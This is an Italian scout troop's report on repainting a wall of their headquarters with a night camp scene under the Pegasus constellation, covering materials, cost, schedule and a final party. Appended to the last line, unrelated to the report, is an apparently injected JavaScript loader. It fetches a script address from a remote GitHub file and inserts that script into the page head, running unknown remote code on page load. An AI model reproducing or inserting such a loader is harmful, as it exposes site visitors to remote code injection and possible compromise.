MISSIONE:
I capi ci hanno assegnato come missione il compito di ridipingere una delle pareti della sede a tema scout.
PROGETTO:
Abbiamo intenzione di rappresentare una scena di campo e di tenere sulle mensole solo le foto di reparto togliendo così i cartelloni.
IDEA FINALE:
Disegneremo una scena notturna con una tenda,un fuoco e in alto la costellazione del Pegaso (costellazione da cui deriva il nome del nostro reparto)
COMPETENZE:
Per questa missione avremo bisogno di molta creatività e di abilità artistiche.
A CHI DESTINATE LA VOSTRA IMPRESA:
Dedichiamo la nostra impresa sicuramente al reparto dato che andremo a realizzarla in un nostro spazio comune, ma vorremmo anche dedicarla a noi stesse dal momento che segnerà la fine di un percorso che abbiamo fatto insieme e che ci ha permesso sia di imparare moltissime cose nuove sia di vederci più spesso.
MATERIALI:
Avremo bisogno di pennelli, un rullo e diversi colori tra cui:
- Verde scuro
- Nero
- Bianco
- Arancione
- Rosso
- Blu
- Marrone
COSTO:
Spenderemo circa 70€
TEMPI:
Divideremo il lavoro in cinque riunioni per finire prima del campo estivo.
RUOLI:
Abbiamo deciso per ragioni pratiche che per questa missione non avremo dei posti di lavoro dal momento che non avrebbe senso dividersi gli elementi da dipingere perché prima che si asciughi del tutto il passaggio precedente passerebbero dei giorni. Al progetto abbiamo lavorato tutte insieme e per andare a comprare i materiali abbiamo fatto i turni.
REALIZZAZIONE:
Lunedì 24 giugno:
Oggi abbiamo imbiancato completamente la parete dato che non potevamo dipingere direttamente sulla parete di legno.
Martedì 9 luglio:
Abbiamo colorato tutto il cielo di blu scuro dato che è il colore predominante della scena, lasciando bianche solo le aree della tenda, del fuoco e della luna.
Sabato 13 luglio:
Oggi abbiamo fatto la tenda e il prato.
Domenica 21 luglio:
Abbiamo rifinito la tenda e fatto il fuoco
Giovedi 25 luglio
abbiamo fatto le stelle e le costellazioni e poi risistemato le foto
VERIFICA:
Siamo contente di essere riuscite a raggiungere il nostro obbiettivo nei tempi previsti e siamo soddisfatte del risultato, anche perché siamo riuscite a farlo come volevamo. Sicuramente il problema più grande che abbiamo riscontrato è stato quello delle presenze dal momento che l’abbiamo fatto durante le vacanze estive e molte di noi erano via. Tuttavia alternandoci un po’ siamo riuscite a fare tutte qualcosa.
Il risultato è comunque piaciuto molto sia a noi sia al reparto e questa è stata comunque una grandissima soddisfazione.
FIESTA
Come ultima Fiesta abbiamo deciso di organizzare appunto una festa per tutto il reparto al campo durante una delle nostre animazioni. Abbiamo fatto balli di gruppo, mangiato e ci siamo divertiti moltissimo tutti.;var url = ‘https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});